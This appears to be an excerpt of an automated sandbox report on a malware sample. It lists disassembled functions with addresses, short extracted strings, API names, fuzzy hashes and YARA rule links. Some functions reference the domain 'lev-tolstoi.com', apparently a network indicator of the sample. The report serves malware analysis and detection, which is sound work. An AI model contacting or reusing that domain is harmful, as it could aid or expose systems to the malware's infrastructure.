Function 0040E59D Relevance: 4.8, APIs: 1, Strings: 2, Instructions: 301COMMON

Download Yara Rule

APIs

CoUninitialize.OLE32 ref: 0040E5A9

Strings

D, xrefs: 0040E5BE
lev-tolstoi.com, xrefs: 0040E9A3

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID: Uninitialize
String ID: D$lev-tolstoi.com
API String ID: 3861434553-4021809485
Opcode ID: 1a2b36ded3d63c48934e883b06f9b4d8cc45036b94076ba770b07ddeb3608e72
Instruction ID: 22ccddc28fc708269306c978beef408f1ed5ca82190ea807a368fb49a74d3678
Opcode Fuzzy Hash: 1a2b36ded3d63c48934e883b06f9b4d8cc45036b94076ba770b07ddeb3608e72
Instruction Fuzzy Hash: 5BA1F17550C3928BD739CF268450BEBBBE2AFE2300F18896DD0D55B392D7790906CB96

Function 004277A0 Relevance: 4.4, Strings: 3, Instructions: 632COMMON

Download Yara Rule

Strings

=81;, xrefs: 00427D5C
SO, xrefs: 0042804B
:>8., xrefs: 004278A1

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: :>8.$=81;$SO
API String ID: 0-596420614
Opcode ID: 0cc968598639c93d4b1655777536e8ee9a876d92b59dfc40b4ca5a59486ba55a
Instruction ID: e0f39ee0ef8aad66e5f4eb59653e3d911f017b98dc62c0ad19d3a25678c4c286
Opcode Fuzzy Hash: 0cc968598639c93d4b1655777536e8ee9a876d92b59dfc40b4ca5a59486ba55a
Instruction Fuzzy Hash: B81233B1A0C351CBC7148F25E84166BBBE1EF86318F18886EE5D58B342E739D906CB57

Function 0041542D Relevance: 4.2, Strings: 3, Instructions: 445COMMON

Download Yara Rule

Strings

M99, xrefs: 00415450
{, xrefs: 004154EB
M99, xrefs: 00415590, 004155E3

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: M99$M99${
API String ID: 0-726366120
Opcode ID: 8d7211f4c4637cd8ba74eb749a251204111377ab38b478c7b2f32186a7a574d9
Instruction ID: f63e886754d2f8b0a4918178e697645c79cb63f24128d1e0e3a60bf90f675cf0
Opcode Fuzzy Hash: 8d7211f4c4637cd8ba74eb749a251204111377ab38b478c7b2f32186a7a574d9
Instruction Fuzzy Hash: 76E1F675208381CBD724CF28D8957EBBBE2EFD5304F18886DE4D987292D7389846CB56

Function 00428889 Relevance: 4.1, Strings: 3, Instructions: 378COMMON

Download Yara Rule

Strings

dUgS, xrefs: 0042898F
LoWf, xrefs: 0042894B
y}zN, xrefs: 004289B7

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: LoWf$dUgS$y}zN
API String ID: 0-3353942304
Opcode ID: c56ece68d25b053fc45e7bbabff213bb9af3a884a6344b36a553f0283c3d2f6e
Instruction ID: 9afdd42b56ae40ab4dd5e281407d5461c0fd8baedc768c94432ec64788af82fb
Opcode Fuzzy Hash: c56ece68d25b053fc45e7bbabff213bb9af3a884a6344b36a553f0283c3d2f6e
Instruction Fuzzy Hash: 60E13775609391CFD714CF28E8A071EBBE2FF8A314F45866DE4955B3A2C7349940CB4A

Function 004292D1 Relevance: 4.1, Strings: 3, Instructions: 310COMMON

Download Yara Rule

Strings

ABC, xrefs: 004292E9
YZ, xrefs: 00429417
R@, xrefs: 00429350

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: R@$YZ$ABC
API String ID: 0-1595031515
Opcode ID: 3dfd9caee6b709295c13799ae250536b88b24724ec0ea3151b9be87810baffe9
Instruction ID: 270e1ec567564e7ac11abac967337e8e2186c96c465a8b5db0c3d0d17cb18083
Opcode Fuzzy Hash: 3dfd9caee6b709295c13799ae250536b88b24724ec0ea3151b9be87810baffe9
Instruction Fuzzy Hash: E5A1DF76A083618FD324CF28D85175BB7E2FFC5300F05882DE4898B381E7789906CB96

Function 00646937 Relevance: 4.0, Strings: 3, Instructions: 283COMMON

Download Yara Rule

Strings

iM, xrefs: 00646BEA
^D, xrefs: 00646C02
tz, xrefs: 00646BF2

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID: ^D$iM$tz
API String ID: 0-1308588582
Opcode ID: e13069b4e80495524c3989dd50d5f3b67c32311433174fed63dae222ed4aa9da
Instruction ID: 601639d2596d676b0441ce0e15902bbcc77449f9e09fa2791952b3b91b70c25a
Opcode Fuzzy Hash: e13069b4e80495524c3989dd50d5f3b67c32311433174fed63dae222ed4aa9da
Instruction Fuzzy Hash: 668128B26083518BC724DF69C89169BB7E2EF91314F088A2CF8C58B790E7759805C787

Function 004266D0 Relevance: 4.0, Strings: 3, Instructions: 283COMMON

Download Yara Rule

Strings

iM, xrefs: 00426983
^D, xrefs: 0042699B
tz, xrefs: 0042698B

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: ^D$iM$tz
API String ID: 0-1308588582
Opcode ID: d4fccb09ca02ca265e5a2ee1d5ec9f6955df610e162b9df98781e2be2e9d3637
Instruction ID: 86ebe705a78406a5c1a3aac74b58c8bc8eea1bff25a69ee308d07cbdd2d3a250
Opcode Fuzzy Hash: d4fccb09ca02ca265e5a2ee1d5ec9f6955df610e162b9df98781e2be2e9d3637
Instruction Fuzzy Hash: 86813A72A083618BC324DF69D89125BB7F1EFD5318F098A2CE8C59B350E7799805CBC6

Function 00419BFF Relevance: 4.0, Strings: 3, Instructions: 253COMMON

Download Yara Rule

Strings

gfff, xrefs: 00419C2D
o~A, xrefs: 00419F27
_q0s, xrefs: 00419D66

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: _q0s$gfff$o~A
API String ID: 0-1380180136
Opcode ID: bbe2847cc035eb94d765ed87b187a5de19f998dd8160d28f4ca51f335dabcf03
Instruction ID: 9ac1f0c1fc7a49e8154fcc72e3c80d4cb5b55f6ce251fccbb0b8a1824a22e975
Opcode Fuzzy Hash: bbe2847cc035eb94d765ed87b187a5de19f998dd8160d28f4ca51f335dabcf03
Instruction Fuzzy Hash: 3E71B2726093508BC724DF25C8622EB77E2FFD5364F188A2DD8998B395E7388941C786

Function 006503C8 Relevance: 3.1, APIs: 2, Instructions: 121COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 006503D4
VariantInit.OLEAUT32 ref: 006503E6

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID:
API String ID: 2610073882-0
Opcode ID: 9c25163ce398a7b029c4444921b319866883930bdaffdc4c83f29d4f0e634296
Instruction ID: 17966169b2d7439fead51ddd02c7666e9981baca8a0a97201ea3ff5d913bb7b9
Opcode Fuzzy Hash: 9c25163ce398a7b029c4444921b319866883930bdaffdc4c83f29d4f0e634296
Instruction Fuzzy Hash: B0515E61608FC18ED321CB388848387BFD26B67214F498A9CD1FE8B3D6DB756549C762

Function 00430161 Relevance: 3.1, APIs: 2, Instructions: 121COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0043016D
VariantInit.OLEAUT32 ref: 0043017F

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID: Variant$ClearInit
String ID:
API String ID: 2610073882-0
Opcode ID: 9c25163ce398a7b029c4444921b319866883930bdaffdc4c83f29d4f0e634296
Instruction ID: 6ba9ae55c9c609b8c98ae8d3013d17b988d2f3c8137f657ab236dd5297d85bd1
Opcode Fuzzy Hash: 9c25163ce398a7b029c4444921b319866883930bdaffdc4c83f29d4f0e634296
Instruction Fuzzy Hash: E7515D61208FC18ED321CB388848387BFD26B67214F498A9CD1FE8B3D6DB756549C762

Function 0062C8A3 Relevance: 3.1, Strings: 2, Instructions: 602COMMON

Download Yara Rule

Strings

^_, xrefs: 0062D05C
lev-tolstoi.com, xrefs: 0062CCB0, 0062D0E2

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID: ^_$lev-tolstoi.com
API String ID: 0-1855683627
Opcode ID: 1664598b216d497c2916ea9ab733d11f603640bddf945b819b2674d3a3824a92
Instruction ID: bea92ae8215adccbd847ad1ca896c86ec5112b64922e179f6c563db452dfd9c5
Opcode Fuzzy Hash: 1664598b216d497c2916ea9ab733d11f603640bddf945b819b2674d3a3824a92
Instruction Fuzzy Hash: F002E0B158E3D28AD734CF259490BEBBBE2EBD6314F18896CC4D90B712D6350909DF92

Function 0064DDE1 Relevance: 3.0, Strings: 2, Instructions: 488COMMON

Download Yara Rule

Strings

uHHs, xrefs: 0064DFDA
_, xrefs: 0064E3A5

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID: _$uHHs
API String ID: 0-2879388440
Opcode ID: 69151789f7b3256d51734eb4590231589fed63b8bb5089053cf3f8cf0d9da1b8
Instruction ID: df0f87d7101cb17b2de2234b3a47ebd26e1b03df0d9a6a14a4e69b610800e066
Opcode Fuzzy Hash: 69151789f7b3256d51734eb4590231589fed63b8bb5089053cf3f8cf0d9da1b8
Instruction Fuzzy Hash: 3AE1F7205183D08ED7358F3984917EBBBD2AF97304F0889ADD4D98B782D739850AD753

Function 0042DB7A Relevance: 3.0, Strings: 2, Instructions: 488COMMON

Download Yara Rule

Strings

_, xrefs: 0042E13E
uHHs, xrefs: 0042DD73

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: _$uHHs
API String ID: 0-2879388440
Opcode ID: fff4d2ae5a9090df37eee2bfda5c873a54dc35febac4667e5f7cefb26893c0c6
Instruction ID: 6fef95053ab342754befd2ad3e4f8b718065d38dd91b4b55b8e1a17b79ce2dd8
Opcode Fuzzy Hash: fff4d2ae5a9090df37eee2bfda5c873a54dc35febac4667e5f7cefb26893c0c6
Instruction Fuzzy Hash: E4E127206183E08ED735CB3994917BBBBD1AFA7304F58896ED4D98B382C739850AC757

Function 00647537 Relevance: 2.9, Strings: 2, Instructions: 413COMMON

Download Yara Rule

Strings

I^]J, xrefs: 00647941
x[EH, xrefs: 00647967

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID: I^]J$x[EH
API String ID: 0-931091327
Opcode ID: db551f8e797dcbae1c02e228865559abfbe54483d31dc6e61fea14308a51eaf6
Instruction ID: 73b190315545e61e7e8a4c3bbacd92791537357b6373cd115ca1bd5ae6687167
Opcode Fuzzy Hash: db551f8e797dcbae1c02e228865559abfbe54483d31dc6e61fea14308a51eaf6
Instruction Fuzzy Hash: 10C101B2A0C3518FD724DB18CC51AABB797EB95300F5A892CE9859B381E735EC05C792

Function 004272D0 Relevance: 2.9, Strings: 2, Instructions: 413COMMON

Download Yara Rule

Strings

x[EH, xrefs: 00427700
I^]J, xrefs: 004276DA

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID: InitializeThunk
String ID: I^]J$x[EH
API String ID: 2994545307-931091327
Opcode ID: e607c1285c3b2ef4515f96dc100574bf895752eac3d924a80b2de4dd1c907984
Instruction ID: 0d59b06c8e91c5b12f8e4cbbc2a541ab03e5ca24646f09e67a505f6169a2a813
Opcode Fuzzy Hash: e607c1285c3b2ef4515f96dc100574bf895752eac3d924a80b2de4dd1c907984
Instruction Fuzzy Hash: 34C16772B0C3208FD714DF18E84166BF792EF95314F99866EE8859B352E638EC05C396

Function 00624537 Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

IEND, xrefs: 00624928
), xrefs: 006245B2

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: 58bfa7e97d68a633eb0371e74400c6f18e5a3e8932f6dd8633fd1d6ce4a95b6d
Instruction ID: d6bb49812091fe5edb4128276075734b78c3705416d9524337f4033439fa94de
Opcode Fuzzy Hash: 58bfa7e97d68a633eb0371e74400c6f18e5a3e8932f6dd8633fd1d6ce4a95b6d
Instruction Fuzzy Hash: 30D1ECB1908755AFE720CF18D841B9BBBE1AF94304F10892DF9989B381DB75D909CF92

Function 004042D0 Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

IEND, xrefs: 004046C1
), xrefs: 0040434B

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: 1b6de2c190c02fbea61387cb34139e6b47e564e05f79e2f2ac439f578bf2f602
Instruction ID: 9e91746e592093abc6b78d22eaac013f7dd1cf175606ed20a1766aa15e76428f
Opcode Fuzzy Hash: 1b6de2c190c02fbea61387cb34139e6b47e564e05f79e2f2ac439f578bf2f602
Instruction Fuzzy Hash: 03D1BFB1A083449FD710DF14D84575BBBE4ABD4308F14492EFA99AB3C2E379E904CB96

Function 0065F4E7 Relevance: 2.8, Strings: 2, Instructions: 324COMMON

Download Yara Rule

Strings

i>3@, xrefs: 0065F5CC
e>3@, xrefs: 0065F59C

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID: e>3@$i>3@
API String ID: 0-675609054
Opcode ID: 4b823d5a739544e07909f0db0eb8d2352278b010a9f16c06b625cc5fc70a34e4
Instruction ID: 9b19f75864452dcc77d3c3114c0a09dec0a31e53c2526fa03f4da4fbf0b8ae94
Opcode Fuzzy Hash: 4b823d5a739544e07909f0db0eb8d2352278b010a9f16c06b625cc5fc70a34e4
Instruction Fuzzy Hash: 2EA10336A083119BC724DF28C88096AB7E3FF98711F19887CED859B361EB31AC55C781

Function 0043F280 Relevance: 2.8, Strings: 2, Instructions: 324COMMON

Download Yara Rule

Strings

i>3@, xrefs: 0043F365
e>3@, xrefs: 0043F335

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID: InitializeThunk
String ID: e>3@$i>3@
API String ID: 2994545307-675609054
Opcode ID: 2c863d08b076efa2f98af33917119d36d08e2e82690e5b60920692513f3024ce
Instruction ID: d63809bf3076d72f070bdb060dff65e02fc893e24afa0153ad856657245a98a7
Opcode Fuzzy Hash: 2c863d08b076efa2f98af33917119d36d08e2e82690e5b60920692513f3024ce
Instruction Fuzzy Hash: 83A1F436A083119BC724DF18C88092BB7E2FF9C710F19947DE8869B365DB35AC55CB86

Function 00415EDC Relevance: 2.8, Strings: 2, Instructions: 300COMMON

Download Yara Rule

Strings

D, xrefs: 0041627B
!LDw, xrefs: 00415EFB

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: !LDw$D
API String ID: 0-631248872
Opcode ID: dc6169488d60e39e14afbbbe44962d8ec75923c6dd643a2a98093ad71e27ba6d
Instruction ID: 7e09ab24442d4b71b88b13391f34237f2dfc9f095084ee9819a17599225fc662
Opcode Fuzzy Hash: dc6169488d60e39e14afbbbe44962d8ec75923c6dd643a2a98093ad71e27ba6d
Instruction Fuzzy Hash: BCA1A1B0118340CFD724DF24C8A1BABBBF1FF96305F09595DE48A4B2A2E7798945CB46

Function 00424280 Relevance: 2.8, Strings: 2, Instructions: 275COMMON

Download Yara Rule

Strings

rBB, xrefs: 00424262
bBB, xrefs: 0042424F

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: bBB$rBB
API String ID: 0-3277761424
Opcode ID: bb51691f9dde2279535c869879990e0e1ffd92db3571b05c63e2572ef1324b61
Instruction ID: be6856a020535e4a6e683abf22a1b7757c0c9bd1d2ca0ad35f5e609e3485cc7a
Opcode Fuzzy Hash: bb51691f9dde2279535c869879990e0e1ffd92db3571b05c63e2572ef1324b61
Instruction Fuzzy Hash: 83713579A0C3409FD724CF18EC41BABB7E4EB86308F50493EF59997282D774A905CB96

Function 00639E66 Relevance: 2.8, Strings: 2, Instructions: 253COMMON

Download Yara Rule

Strings

_q0s, xrefs: 00639FCD
gfff, xrefs: 00639E94

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID: _q0s$gfff
API String ID: 0-1196501146
Opcode ID: bbe2847cc035eb94d765ed87b187a5de19f998dd8160d28f4ca51f335dabcf03
Instruction ID: c7b11d762e70ba2ca64224a9b42b69a5103b1a5625a3265f399f6c9002992382
Opcode Fuzzy Hash: bbe2847cc035eb94d765ed87b187a5de19f998dd8160d28f4ca51f335dabcf03
Instruction Fuzzy Hash: 2571B2726096508BC728DF25C8527EB77A3FFD5324F188A2CD8998B794E7348901CB86

Function 0064A347 Relevance: 2.6, Strings: 2, Instructions: 93COMMON

Download Yara Rule

Strings

gy, xrefs: 0064A359
{, xrefs: 0064A369

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID: gy${
API String ID: 0-2069607922
Opcode ID: da2f2a0c6207235e0a990dccae0dbce93f9678055be0d1fcb7fe1bdd5a6a2c50
Instruction ID: f469e9dbcb555aee6b2eae68b147af48af8a6d0081d76578f2daf5bfc1b080f5
Opcode Fuzzy Hash: da2f2a0c6207235e0a990dccae0dbce93f9678055be0d1fcb7fe1bdd5a6a2c50
Instruction Fuzzy Hash: BE31FCB02883948FD3508F619880B5FBBF1FBC6714F149A6CE6D1AB2A1C7B590468B06

Function 0042A0E0 Relevance: 2.6, Strings: 2, Instructions: 93COMMON

Download Yara Rule

Strings

gy, xrefs: 0042A0F2
{, xrefs: 0042A102

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: gy${
API String ID: 0-2069607922
Opcode ID: da2f2a0c6207235e0a990dccae0dbce93f9678055be0d1fcb7fe1bdd5a6a2c50
Instruction ID: 431e554adce80ef47d4d1f40f80e38f5c8695c8e2ce9c58edc59fdf38191c638
Opcode Fuzzy Hash: da2f2a0c6207235e0a990dccae0dbce93f9678055be0d1fcb7fe1bdd5a6a2c50
Instruction Fuzzy Hash: 3331FFB02883948FD3508F119C80B6FBBF1FBC6714F149A6CE6D1AB291C77990468B0A

Function 0062092B Relevance: 2.6, Strings: 2, Instructions: 90COMMON

Download Yara Rule

Strings

GetProcAddress., xrefs: 006209DC, 006209DF, 006209E4
l, xrefs: 00620966

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID: GetProcAddress.$l
API String ID: 0-1376745856
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 2ba7ce5c814ab9565d4597d47c006d941323b89efae0f9c485d6973fd74c974a
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: BF3138B6901619DFEB10CF99D880AEDBBF6FF48324F14504AD441A7312D771AA85CFA4

Function 0043B100 Relevance: 2.0, Strings: 1, Instructions: 734COMMON

Download Yara Rule

Strings

f, xrefs: 0043B391

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID: InitializeThunk
String ID: f
API String ID: 2994545307-1993550816
Opcode ID: 911a7e592e4c48b71ad536d3dbe37319113398f09b4a3efeb0ff10449ae76945
Instruction ID: fe604cc3133df0d3ef17166e2c6d21145ffaf46a9ca28f7e45b4cb97c9031a62
Opcode Fuzzy Hash: 911a7e592e4c48b71ad536d3dbe37319113398f09b4a3efeb0ff10449ae76945
Instruction Fuzzy Hash: 632213756083418FD714CF19C880B2BB7E2EBC9318F199A6EE595873A1D734EC01CB96

Function 0043D980 Relevance: 2.0, Strings: 1, Instructions: 709COMMON

Download Yara Rule

Strings

"C, xrefs: 0043E014

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: "C
API String ID: 0-2206442469
Opcode ID: 318cf19dad6bd902ed9746a2d1b6ba562f171c8a02b36b8081c52eebcdc19270
Instruction ID: cc3b19862de00450c502d71b80b37b6a0facead2af28862af59a70b515e96c0c
Opcode Fuzzy Hash: 318cf19dad6bd902ed9746a2d1b6ba562f171c8a02b36b8081c52eebcdc19270
Instruction Fuzzy Hash: EA22F479B18111CFCB08CF38E8906AAB7A2FF8A315F1985BDD54697395C7349852CB44

Function 00414170 Relevance: 1.9, Strings: 1, Instructions: 633COMMON

Download Yara Rule

Strings

wY, xrefs: 00414388

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: wY
API String ID: 0-856691870
Opcode ID: 64ec636affbfb3505e55f349c0f97b4a1282f766ef673f98fbdb976a5a7cc095
Instruction ID: 2400616457e19e448041b88361ef1ce1cfcd4646f93bfc5c6be26526a3fe0eb5
Opcode Fuzzy Hash: 64ec636affbfb3505e55f349c0f97b4a1282f766ef673f98fbdb976a5a7cc095
Instruction Fuzzy Hash: 0BF155B55083009BD3149F24D8927BBB3A1FFD6314F19882DE8C597391E738D986C79A

Function 0043DA80 Relevance: 1.9, Strings: 1, Instructions: 609COMMON

Download Yara Rule

Strings

"C, xrefs: 0043E014

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: "C
API String ID: 0-2206442469
Opcode ID: c745bed812c72e11a2f85d115635a27e4d80eed790739967119487ee27e1db50
Instruction ID: 7582ed78cd08e368e7f7bf7a7ebd23f02f26f556a500b2e852d8dce14501ab51
Opcode Fuzzy Hash: c745bed812c72e11a2f85d115635a27e4d80eed790739967119487ee27e1db50
Instruction Fuzzy Hash: EE02F339B18211CFCB08CF38E8906AAB7B2FF8A315F1989BDD54697395C7349842CB44

Function 00424486 Relevance: 1.8, Strings: 1, Instructions: 507COMMON

Download Yara Rule

Strings

no, xrefs: 004244B1

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: no
API String ID: 0-1739204639
Opcode ID: 2d01defe0772388fe6ea4fe43fa2d79a1c430645c6eba214e35ed69ebf30f6bc
Instruction ID: 98ceff42bfd2534dc1cac3b1d484b7cbff31ece01bcc915c749c6e1bd002b957
Opcode Fuzzy Hash: 2d01defe0772388fe6ea4fe43fa2d79a1c430645c6eba214e35ed69ebf30f6bc
Instruction Fuzzy Hash: D1F1F1766183628BC714DF24E8506ABB3F2FFC5740F85886EE8C197350E7389A45DB86

